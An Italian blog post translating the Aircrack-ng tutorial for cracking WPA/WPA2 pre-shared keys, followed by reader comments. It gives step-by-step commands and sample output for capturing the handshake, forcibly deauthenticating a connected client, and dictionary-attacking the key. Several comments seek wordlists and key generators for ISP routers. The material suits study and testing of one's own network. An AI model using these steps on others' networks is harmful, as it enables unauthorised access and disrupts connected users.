Craccare una WPA / WPA2 con Aircrack – NG ( Linux ) (aggiornato)


Ormai ci siamo! Mancano poche ore all’inizio di Info Free Flow 3.0 ( oggi in aula c, facoltà di scienze politiche, strada maggiore 45, Bologna, a partire dalle ore 14 ) e noi vi vogliamo dare un altro assaggino di uno degli wokshop che terremo sabato ( Wifi4All ) continuando a proporvi le traduzioni in italiano dei tutorial di Aircrack -NG .

Cominciamo…

LINK ORIGINALE

  • INTRODUZIONE


Questa guida vi accompagna nel cracking delle reti WPA/WPA2, che utilizzano chiavi pre-condivise. Si raccomanda di svolgere delle letture sul tema per meglio capire cos’è il WPA/WPA2. La pagina dei links del wiki ha una sezione sul wpa/wpa2. Il miglior documento per descrivere la WPA è Wi-fi Security – WEP, WPA
and WPA2
. Ecco il link al download diretto del PDF. L’Approfondimento sulla Cattura dei Pacchetti WPA/WPA2 completa questa guida.

l WPA/WPA2 supporta molti tipi di autenticazione oltre alle chiavi pre-condivise.aircrack-ng può SOLO craccare le chiavi pre-condivise. Così assicuratevi che airodump-ng mostri che la rete abbia un’autenticazione di tipo PSK, altrimenti non perdete tempo nel provare a craccarla.

C’è un’altra differenza importante tra il craccare il WPA/WPA2 ed il WEP. Questo è l’approccio utilizzato per craccare la chiave pre-condivisa WPA/WPA2. A differenza del WEP, dove si possono utilizzare metodi statistici per velocizzare il processo di cracking, si possono solo utilizzare attacchi prettamente brute force contro il WPA/WPA2. Non si può velocizzare l’attacco, non essendo la chiave statica come quando si raccolgono gli IV al momento del cracking di una crittazione WEP. La sola fonte che offre le informazioni per avviare un attacco è la stretta di mano ( "handshake" ) tra il client e l’AP. L’handshaking viene effettuato quando il client si connette alla rete. Sebbene non sia vero in termini assoluti, consideratelo come tale ai fini di questa guida. Dato che la chiave pre-condivisa può essere lunga da 8 a 13 caratteri, diventa effettivamente impossibile craccare la chiave pre-condivisa.

L’unico momento in cui potete craccare la chiave pre-caricata è se si tratta di una parola di dizionario o se sia di lunghezza relativamente breve. Specularmente, se volete avere una rete wireless domestica a prova di bomba, utilizzate il WPA/WPA2 ed una password composta di 63 caratteri randomici, simboli speciali inclusi.

L’impatto di dover utilizzare un approccio brute force è notevole. Siccome richiede una computazione altamente intensiva potete testare solo da 50 a 300 possibili chiavi al secondo, a seconda della CPU del computer. Può richiedere ore, se non giorni, per macinare un ampio dizionario. Se state pensado di generare la vostra lista personale di password per coprire tutte le permutazioni e le combinazioni di caratteri e simboli speciali, consultate questo calcolatore di tempo brute force. Vi sorprenderete di quanto tempo ci voglia.

Non vi sono differenze tra craccare una rete WPA od una WPA2. La metodologia di autenticazione tra loro è praticamente la stessa. Così le tecniche da utilizzare sono identiche.

E’ consigliato fare delle prove con il vostro access point wireless domestico per familiarizzare con queste idee e tecniche. Se non possedete un dato access point, badate a chiedere il permesso al proprietario prima di smanettarci.

Vorrei segnalare e ringraziare l’Aircrack-ng team per aver prodotto uno strumento così ben robusto.

Per favore, inviatemi ogni critica costruttiva, positiva o negativa. Ulteriori idee e consigli riguardo alla risoluzione
dei problemi sono in particolar modo ben accetti.


  • PRESUPPOSTI

Per cominciare, questa trattazione presume:
– Che stiate utilizzando driver patchati per l’iniezione. Utilizzate il test d’iniezione per confermare la capacità della vostra scheda di iniettare.
– Che siate fisicamente abbastanza vicini per inviare e ricevere i pacchetti dell’access point e del client wireless. Ricordatevi che il ricevere pacchetti da loro non significa che potreste essere in grado di trasmettergliene. La forza della scheda wireless è di solito minore della forza dell’AP. Così dovrete essere fisicamente abbastanza vicini per permettere ai pacchetti che trasmettete di raggiungere ed essere ricevuti sia dall’AP che dal client wireless. Dovreste confermare di poter comunicare con l’AP specifico seguendo queste istruzioni.
– Che stiate utilizzando la versione 0.9 di aircrack-ng. Se state utilizzando un’altra versione, alcune delle opzioni di comando potrebbero dover essere modificate.

Accertatevi che tutte le presupposizioni qui sopra siano rispettate, in caso contrario le istruzioni che seguono saranno vane. Negli esempi sottostanti, avrete bisogno di cambiare "ath0" nel nome dell’interfaccia specifico della vostra scheda wireless.

Negli esempi, l’opzione "trattino doppio, bssid" viene mostrata come "–bssid". Ricordatevi di rimuovere lo spazio tra i due trattini quando la utilizzate sul terminale. Ciò vale anche per "–ivs", "–arpreplay","–deauth","–channel","–arp" e "–fakeauth".


  • EQUIPAGGIAMENTO UTILIZZATO

Per seguire questo tutorial a casa, dovete avere due schede wireless.

Ecco ciò che è stato utilizzato in questo tutorial:

– l’indirizzo MAC del PC che esegue la suite aircrack: 00:0F:B5:88:AC:82
– l’indirizzo MAC del client wireless che utilizza il WPA2: 00:0F:B5:FD:FB:C2
– BSSID (indirizzo MAC dell’access point): 00:14:6C:7E:40:80
– ESSID (nome della rete wireless): teddy
– Canale dell’access point: 9
– Interfaccia wireless: ath0

Dovreste raccogliere le specifiche equivalenti per la rete su cui lavorerete. Quindi cambiate semplicemente i valori negli esempi qui sotto in quelli della vostra specifica rete.


  • PROCEDURA


Panorama della procedura

L’obiettivo è quello di catturare l’handshake di autenticazione WPA/WPA2, e quindi utilizzare aircrack-ng per craccare la chiave pre-condivisa.

Si può fare attivamente o passivamente."Attivamente" significa che accelererete il processo deautenticando un client wireless esistente. "Passivamente" significa che aspetterete semplicemente che un client wireless si autentichi sulla rete WPA/WPA2. Il vantaggio della modalità passiva è che non vi occorre un’effettiva capacità d’iniezione, perciò è possibile usare anche la versione di aircrack-ng per Windows.

Ecco i passaggi basilari che attraverseremo:

1. Avviare l’interfaccia wireless in monitor mode sullo specifico canale dell’AP
2. Avviare airodump-ng sul canale dell’AP con il filtro per il bssid per raccogliere l’handshake di autenticazione
3. Utilizzare aireplay-ng per deautenticare il client wireless
4. Eseguire aircrack-ng per craccare la chiave pre-condivisa utilizzando l’handshake di autenticazione.


PASSO 1 – AVVIATE L’INTERFACCIA WIRELESS IN MONITOR MODE

Lo scopo di questo passaggio è di mettere la vostra scheda in quello che viene chiamato monitor mode. Il monitor mode è la modalità in cui la vostra scheda può intercettare ogni pacchetto nell’etere. Normalmente, la vostra scheda "ascolta" solo i pacchetti inviati a voi. Intercettando ogni pacchetto, possiamo in seguito catturare l’handshake WPA/WPA2. Inoltre, ci permetterà opzionalmente di deautenticare un client wireless in un passaggio successivo.

Per prima cosa fermate ath0 digitando:
________________________________
airmon-ng stop ath0
________________________________

Il sistema risponde:
_________________________________________________________________
 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
_______________________________________________________________________________

Digitate "iwconfig" per assicurarvi che non ci siano altre interfacce athX. Dovrebbe apparire simile a questo:
_____________________________________________________
 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.
______________________________________________________

Se ci sono altre residue interfacce athX, fermate ciascuna di esse. Quando avete finito, eseguite "iwconfig" per assicurarvi che non ne sia rimasta nessuna. Ora, immettete il seguente comando per avviare la scheda wireless sul canale 9 in monitor mode:
_________________________________
airmon-ng start wifi0 9
_________________________________

Nota: in questo comando utilizziamo "wifi0" invece della nostra interfaccia wireless di "ath0". Questo perché utilizziamo i driver madwifi-ng.
Il sistema risponderà:
_____________________________________________________________
 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
______________________________________________________________

Noterete che "ath0" viene qui sopra segnalato essere in monitor mode.
Per confermare l’appropriata configurazione dell’interfaccia, digitate "iwconfig".
Il sistema rispondrà:
______________________________________________________________
 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0
_______________________________________________________________

Nel responso qui sopra, potete notare che ath0 è in monitor mode, sulla frequenza 2.452GHz che è il canale 9 e l’Access Point mostra l’indirizzo MAC della vostra scheda wireless. Prestate attenzione al fatto che solo i driver madwifi-ng mostrano l’indirizzo MAC della vostra scheda wireless, gli altri non lo fanno. Quindi tutto va bene. E’ importante confermare tutte queste informazioni prima di procedere, altrimenti i passaggi successivi non funzioneranno correttamente.

Per rispecchiare la frequenza del canale, controllate http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels , quindi selezionate la targhetta "Wifi Channel Selection and Channel Overlap". Ciò vi darà la frequenza di ogni canale.

PASSO 2 – AVVIATE AIRODUMP-NG PER RACCOGLIERE L’HANDSHAKE DI AUTENTICAZIONE

Lo scopo di questo passaggio è di eseguire airodump-ng per catturare l’handshake bilaterale di autenticazione che ci interessa:

Inserite:
___________________________________________
 airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w psk ath0
___________________________________________

Dove:
–  -c 9 è il canale della rete wireless
–  –bssid 00:14:6C:7E:40:80 è l’indirizzo MAC dell’access point. Questo elimina il traffico estraneo.
–  -w .psk è il prefisso del file che conterrà gli IV 

– ath0 è il nome dell’interfaccia.

Importante: NON utilizzate l’opzione "–ivs".Dovete catturare i pacchetti completi.

Ecco come appare la situazione se un client wireless è connesso alla rete:
______________________________________________
 CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  
__________________________________

Nella schermata sopra, notate la scritta “WPA handshake:
00:14:6C:7E:40:80” nell’angolo in alto a destra.
Ciò vuol dire che airodump-ng ha catturato con successo l’handshake.


Eccola senza client wireless connessi:
__________________________________

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
__________________________________

CONSIGLI PER LA RISOLUZIONE DEI PROBLEMI

Consultate la sezione dei Consigli per la Risoluzione dei Problemi più
avanti per altri spunti.
Esistono due modi per capire se siete riusciti a catturare dei pacchetti
handshake. Osservate nella schermata
di airodump-ng “WPA handshake: 00:14:6C:7E:40:80” nell’angolo in alto a
destra. Ciò vuol dire che è stata catturata con successo un’handshake. Trovate qui sopra la schermata di esempio.

Per controllare se avete catturato dei pacchetti di handshake, utilizzate Wireshark ed applicate un filtro di "eapol". Ciò mostra solo i pacchetti eapol che vi interessano. Così potete vedere se catturate pacchetti eapol 0,1,2,3 o 4.

PASSO 3 – UTILIZZARE AIREPLAY-NG PER DEAUTENTICARE IL CLIENT WIRELESS

Questo passaggio è opzionale. Lo effettuerete solo se deciderete di velocizzare attivamente il processo. L’altro vincolo è che ci debba essere almeno un client wireless correntemente associato all’AP. Se non ce n’é nessuno, continuate con il passagio successivo e siate pazienti. Non c’è bisogno di dire che se un client wireless compare più avanti potete tornare sui vostri passi e continuare con questo passaggio.

Ciò che si fa in questo passaggio è di inviare un messaggio al client wireless dicendogli che non è più associato all’AP. Il client wireless vorrà sperabilmente riautenticarsi con l’AP. La riautenticazione è ciò che genera l’handshake che ci interessa raccogliere. Che è quella che utilizziamo per rompere la chiave WPA/WPA2 pre-condivisa.

Basandovi sull’output di airodump-ng del passaggio precedente, individuate un client attualmente associato. Vi occorre l’indirizzo MAC per quanto segue. Aprite un altro terminale ed inserite:
_________________________________
 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
_________________________________

Dove:

– 0 significa deautenticazione
– 1 è il numero di deauth che inviate (potete mandarne di multipli se desiderate);
– -a 00:14:6C:7E:40:80 è l’indirizzo MAC dell’access point
– -c 00:0F:B5:FD:FB:C2 è l’indirizzo MAC del client da deautenticare;
– ath0 è il nome dell’interfaccia

Ecco come appare l’output:
_______________________
 11:09:28  Sending DeAuth to station   — STMAC: [00:0F:B5:34:30:30]
_______________________

Con un po’ di fortuna, questo costringe il client a riautenticarsi e porta all’handshake .

CONSIGLIO PER LA RISOLUZIONE DEI PROBLEMI

– I pacchetti di deautenticazione vengono inviati direttamente dal vostro PC ai client. Perciò dovete essere abbastanza vicini fisicamente ai client affinché le trasmissioni della vostra scheda wireless li raggiungano.


PASSO 4 – ESEGUITE AIRCRACK-NG PER CRACCARE LA CHIAVE PRE-CONDIVISA

Lo scopo di questo passaggio è di craccare effettivamente la chiave WPA/WPA2 pre-condivisa. Per farlo, vi occorre come input un dizionario di parole. Essenzialmente, aircrack-ng prende ogni parola e prova a vedere se sia in realtà la chiave precondivisa.

C’è un piccolo dizionario allegato ad aircrack-ng – "password.lst". Questo file si può trovare nella directory "test" del codice sorgente di aircrack-ng. La FAQ del Wiki ha un’ampia lista di fonti di dizionario. Potete utilizzare John The Ripper (JTR) per generare la vostra lista personale di termini e inserirli in aircrack-ng. L’utilizzo congiunto di JTR ed aircrack-ng va oltre lo scopo di questa guida.

Aprite un altro terminale ed inserite:
________________________________
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
________________________________

Dove:

– -w password.lst è il nome del file di dizionario. Ricordatevi di specificare tutto il percorso se il file non si trova nella stessa directory.
– *.cap è il nome del gruppo di file che contiene i pacchetti catturati. Notate in questo caso l’utilizzo del jolly * per includere file multipli.

Ecco l’output tipico di quando non risultano handshake:
___________________________________
 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 No valid WPA handshakes found.
___________________________________

Quando ciò accade, dovete ripetere il passaggio 3 (deautenticare il client wireless) od aspettare ancora se state utilizzando l’approccio passivo. In questo caso, dovete attendere finché un client wireless non si autentichi con l’AP.

Ecco l’output tipico di quando si trovano handshake:
___________________________________
 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.
 
 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
 
 Choosing first network as target.
___________________________________

A uesto punto aircrack-ng inizierà i tentativi di craccare la chiave pre-condivisa. A seconda della veelocità della vostra CPU e dalle dimensioni del dizionario, ciò potrebbe richiedere molto tempo, anche giorni.

Ecco come appare un tentativo riuscito di craccare la chiave pre-condivisa:
___________________________________
 Aircrack-ng 0.8
 
 
                 [00:00:00] 2 keys tested (37.20 k/s)
 
 
                         KEY FOUND! [ 12345678 ]
 
 
    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
 
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
_____________________________

 


CONSIGLI PER LA RISOLUZIONE DEI PROBLEMI

 

– Non riesco a catturare l’Handshake!

A volte può essere macchinoso catturare l’handshake. Ecco
alcuni consigli preventivi per affrontare il problema:

– La vostra scheda di monitor deve trovarsi nella stessa modalità sia del
client che dell’Access Point. Così ad esempio, se la vostra scheda è in
modalità "B" ed il client/AP usano la modalità "G", non riuscirete a
catturare l’handshake. Ciò è particolarmente importante per nuovi AP e
client che potrebbero trovarsi in modalità "turbo" e/o in altri nuovi
standard. Alcuni driver vi permetteranno di specificare la modalità.
Inoltre, iwconfig ha l’opzione "modulation" che a volte può essere
utilizzata. Digitate "man iwconfig" per vedere le opzioni di "modulation".
A titolo informativo, 1, 2, 5.5 ed 11 Mbit sono ‘b’ mentre 6, 9, 12, 18,
24, 36, 48 e 54 Mbit sono ‘g’.

– A volte avrete anche bisogno di settare la scheda per il monitor mode
alla stessa velocità. Es. auto, 1MB, 2MB, 11MB, 54MB, ecc.

– Assicuratevi che la vostra scheda di cattura sia ristretta allo stesso
canale dell’AP. Potete farlo specificando "-c <canale dell’AP>" quando
avviate airodump-ng.

– Assicuratevi che non vi siano utilità di
connessione come networkmanager, wicd o rtutil attivi sul vostro sistema. Possono cambiare canali e/o
modalità senza che lo sappiate.

– Siate fisicamente abbastanza vicini sia all’access point che al client
wireless per riceverne i pacchetti. La potenza della scheda wireless è
solitamente minore della potenza dell’AP.

– Di contro, con la troppa vicinanza i pacchetti ricevuti possono venire danneggiati e scartati. Quindi non potete essere troppo vicini.

– Assicuratevi di utilizzare i driver specificati sul wiki. A seconda del
driver, alcune vecchie versioni non catturano tutti i pacchetti.

– Idealmente, connettete e disconnettete un client wireless normalmente per
generare l’handshake.

– Se utilizzate la tecnica di deautenticazione, inviate il minor numero
possibile di pacchetti per fare in modo che il client si riautentichi.
Normalmente è richiesto un singolo pacchetto di deautenticazione. Inviarne
un numero eccessivo può risultare nel fallimento di riconnessione del
client e quindi non generare l’handshake. Ancora, utilizzate
deautenticazioni dirette, non diffuse.

– Provate a bloccare la radio sulla stazione del client, quindi
riavviatela.

– Assicuratevi di non avere avviati altri programmi/processi che potrebbero
interferire come utilità di connessione, Kismet, ecc.

– Esaminate i dati catturati utilizzando l’ Approfondimento sulla Cattura dei Pacchetti WPA/WPA2 per vedere se riuscite ad identificare i problemi come pacchetti
AP mancanti, pacchetti client mancanti, ecc.

Sfortunatamente, a volte dovrete fare un po’ di prove per fare in modo che
la vostra scheda catturi l’handshake in modo appropriato. Il
punto è, se non ce la fate al primo colpo, pazientate e
sperimentate un po’. Si può fare! 😉

Un altro approccio è quello di utilizzare Wireshark per rivedere ed
analizzare la vostra cattura di pacchetti. Questo a volte può darvi
qualche indizio riguardo a cosa non funziona, e quindi degli spunti su come
porvi rimedio. L’Approfondimento sulla Cattura dei Pacchetti WPA/WPA2 completa questa
guida e vi mostra come appare una connessione WPA "normale". Ancora,
consultate la ->FAQ per informazioni dettagliate su come utilizzare
Wireshark.

In un mondo ideale, dovreste utilizzare strumentazione wireless dedicata
per catturare i pacchetti. Questo perché alcuni driver come l’RTL8187L non
catturano i pacchetti che la scheda stessa invia. Inoltre, usate le
versioni del driver specificate sul wiki. Questo perché alcune vecchie
versioni dei driver come l’RT73 non catturano i pacchetti del client.

Quando usate Wireshark, il filtro "eapol" mostrerà rapidamente solo i
pacchetti EAPOL. Basandovi su quali pacchetti EAPOL siano di fatto nella
cattura, determinate il vostro piano di correzione. Ad esempio, se vi
mancano i pacchetti del client, provate a determinare come e perché
raccogliere pacchetti client.

Per inoltrarvi nell’analisi dei pacchetti, dovete avviare airodump-ng senza
un filtro BSSID e specificare la cattura dell’intero pacchetto, non solo
gli IV. Non occorre dire che deve essere ristretta al canale dell’AP.
La ragione dell’eliminazione del filtro BSSID è quella di assicurarsi che
tutti i pacchetti che includono riconoscimenti vengano catturati. Con un
filtro BSSID, alcuni pacchetti vengono tralasciati dalla cattura.

Ogni pacchetto inviato dal client o dall’AP deve essere riconosciuto. Ciò
viene effettuato con un pacchetto di "riconoscimento" che possiede
l’indirizzo MAC di destinazione del device che ha inviato il pacchetto
originale. Se state provando a deautenticare un client, controllate se
ricevete il pacchetto "ack". Questo è la conferma che il client ha
ricevuto il pacchetto di deautenticazione. La mancata ricezione del
pacchetto "ack" sta probabilmente a significare che il client è fuori dal
raggio di trasmissione. Insuccesso.

Quando si arriva all’analisi dei pacchetti di cattura è impossibile
fornire istruzioni dettagliate. Abbiamo illustrato alcune tecniche ed
argomenti da tenere presente. Questo è un argomento che richiede impegno
nell’affinare le vostre capacità rispetto alla WPA/WPA2, oltre
all’utilizzo di Wireshark.

– Aircrack-ng dice "0 handshakes"

Consultate il consiglio di risoluzione dei problemi "Non riesco a catturare
l’Handshake!"

– Aircrack-ng dice "No valid WPA handshakes found"

Consultate il consiglio di risoluzione dei problemi "Non riesco a catturare l’Handshake!"  

 

  1. #1 di Fix il Novembre 29, 2011 - 1:52 pm

    Arrivato a questo punto

    aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

    Mi da un errore

    fopen (dictionary) failed: no such file or dictionary
    fopen (dictionary) failed: no such file or dictionary
    open psk-01.cap
    open psk-02.cap
    read(file header) failed: Success
    Quitting aircrack-ng. . .

    Come posso risolvere?

    Ho provato a dargli sia il dizionario che si trova nella Dir /test di aircrack si altri che ho scaricato…ma mi da sempre lo stesso errore…anche con la procedura senza terminale (BUC)

    Help 😀

  2. #2 di ciro il Ottobre 13, 2010 - 8:38 pm

    ciao vojio solo sapere dove scaricare aircrack-ng for windows non zippato

  3. #3 di shairi il Marzo 31, 2010 - 12:58 am

    Salve.

    Stavo provando a testare la robustezza della pw della mia rete domestica.

    Dunque, ho fatto un airdump mentre mi connettevo all’ap col mio notebook.

    Il problema e’ che wireshark NON trova i 4 pachetti dell’handshake, ma solo 2: quelli dal laptop all’ap (filtro eapol), e infatti poi aircrack mi dice “no valid wpa handshake found” :-

    Come mai?

  4. #4 di Elvis il Marzo 25, 2010 - 8:36 pm

    Ciao a tutti come
    e faccio ad usare john con aircrack? In modo da generare chiavi per le Wpa? Grazie

  5. #5 di Giuseppe di Girolamo il Marzo 11, 2010 - 12:34 pm

    Ciao a tutti, c’e’ qualcuno che mi sa spiegare come e’ implementato aircrack, cioe’ come funziona al suo interno.

    ciao

  6. #6 di minimal il Febbraio 5, 2010 - 4:24 pm

    http://link.autistici.org/tags/wordlist

    Qui di dizionari ne trovi parecchi.

  7. #7 di Fox il Febbraio 5, 2010 - 3:52 pm

    vorrei solo capire dove trovare:
    1) un generatore di chiavi come è stato detto da “nessuno” …

    oppure un dizionario o piu dizionari da scaricare..

    grazie,
    Fox

  8. #8 di Piper23fL il Febbraio 3, 2010 - 2:32 am

    I know that we should get know about this post or essay writing. At the paper writing services this is easy to order already written essay and custom writing just about this post.

  9. #9 di sinful il Giugno 8, 2009 - 10:48 pm

    E a questo punto servono un bel po di dizionari seri, perche l’attacco in brute force non ti passa piu. Io suggerirei di associare un password ‘mangler’ come JTR (il mitico John) per creare molte delle possibili combinazioni alle passwords del tuo dizionario.
    Suggerimenti circa siti in cui trovare dizionari (liste di password) seri in lingue diverse sono ben accetti.
    Ciareia.

  10. #10 di nessuno il Giugno 2, 2009 - 11:57 am

    @mauro
    si esatto.
    per crackare un wpa, una volta catturato l’handshake, ci sono due alternative:
    1) usare un generatore di chiavi
    2) usare un dizionario

    Il primo metodo va’ sicuramente usato per le wpa quali Alice e Fastweb, dove la chiave viene settata dal provider e non e’ mai una parola, ma un insieme pseudo-casuale di caratteri.
    Se sono piu’ di 10 caratteri… ci vuole un bel po’ di tempo…

    Il secondo metodo, piu’ performante se il dizionario e’ stato hashato, implica che la chiave appunto sia una parola inclusa in un set di parole “conosciute”. In genere e’ cosi’ per gli ap che hanno nomi personalizzati o della marca/modello, dove in genere il propietario imposta la sua chiave, e presumibilmente preferirà una/piu’ parole al posto di una sequenza di caratteri.

    Ovviamente se ci sono parole dialettali… meglio il generatore di chiavi.

    Buon handshake a tutti 😀

  11. #11 di mauro il Maggio 15, 2009 - 5:13 pm

    da quello che ho capito si usano dei dizionari per decodificare una chiave WPA,
    se se la chiave WpA non e’ una parola reale ma inventata , tipo dialetto locale e’ impossibile trovare la password. o sbaglio ?

  12. #12 di rocco il Aprile 28, 2009 - 11:55 pm

    come si possono usare queste tables per wpa??

    http://ophcrack.sourceforge.net/tables.php

  13. #13 di nessuno il Aprile 7, 2009 - 10:34 am

    La versione originale inglese riporta questi dati con queste statistiche. Non possiamo fare altro che attenerci a quei dati.

    Comunque non vedo cosa centri l’RTT della wifi, visto che una volta catturato l’handshake, non si deve generare nessun traffico sulla scheda wifi, ma solo lanciare aircrack che fa’ largo uso di *SOLA* cpu.

    Inoltre se devi generarla la lista di password, e se devi anche “hasharla”, per fare in modo che ci si lavori piu’ velocemente, vedrai che quella benetta cpu ti servira’ tantissimo.

    Per la WEP e’ diverso, in quanto il grosso del lavoro lo si fa’ facendo ARP Injection, e li incide la scheda wifi.

    O sgaglio???

  14. #14 di pier il Aprile 7, 2009 - 9:54 am

    Nella prima parte scrivi: “L’impatto di dover utilizzare un approccio brute force è notevole. Siccome richiede una computazione altamente intensiva potete testare solo da 50 a 300 possibili chiavi al secondo, a seconda della CPU del computer” è sbagliata.

    Una cpu genera chiavi successive tra loro molto facilmente. (un 386 te ne genera qualche migliaio al secondo minimo)
    Anche se leggesse dal dizionario, si tratta di semplici operazioni di I/O.
    Il limite sta nella connesisone wireless. Se il tempo di andata e ritorno (RTT) della comunicazione è qualche millisecondo (come normalmente è), gli attacchi possibili, al secondo, sono meno di un migliaio…indipendentemente da cpu o Hard disk.

    Tutto questo perevitare che la gente dica “uh mi serve un quad core per crakkare una wpa”.

    basta un 386 ben settato (ed aperto per qualche migliaio di anni)

  15. #15 di Kurioso il Marzo 25, 2009 - 1:50 am

    Ma un forum ITALIANO e SERIOo sull’argomento WARDRIVING( NOOO GOOGLE, si trova solo crap ) su cui discutere liberamente l’argomento?

  16. #16 di nessuno il Marzo 6, 2009 - 12:34 pm

    @zaffscuregiante

    ah se ne conosci qualcuno decente segnala, anche se non penso che windows sia l’ambiente adatto a queste cose 😀

  17. #17 di zaffscuregiante il Marzo 5, 2009 - 11:04 pm

    esempio se prendo una scheda conchipsedt Athiros , senza incasinarmi la vita posso utilizzare i software che girano sotto windows cosi facendo le cose si semplificano o no?

  18. #18 di iNViSibLe il Febbraio 18, 2009 - 2:14 pm

    @Amnesie: manda un fake deauth

  19. #19 di N il Febbraio 9, 2009 - 3:13 am

    c’e un metodo per catturare l’HandShake velociamente ? ||!

  20. #20 di kermit631 il Dicembre 16, 2008 - 9:18 am

    Qualcuno conosce altro metodo per superare il limite degli 8 caratteri, oltre a quello di modificare il codice?

I commenti sono stati disattivati.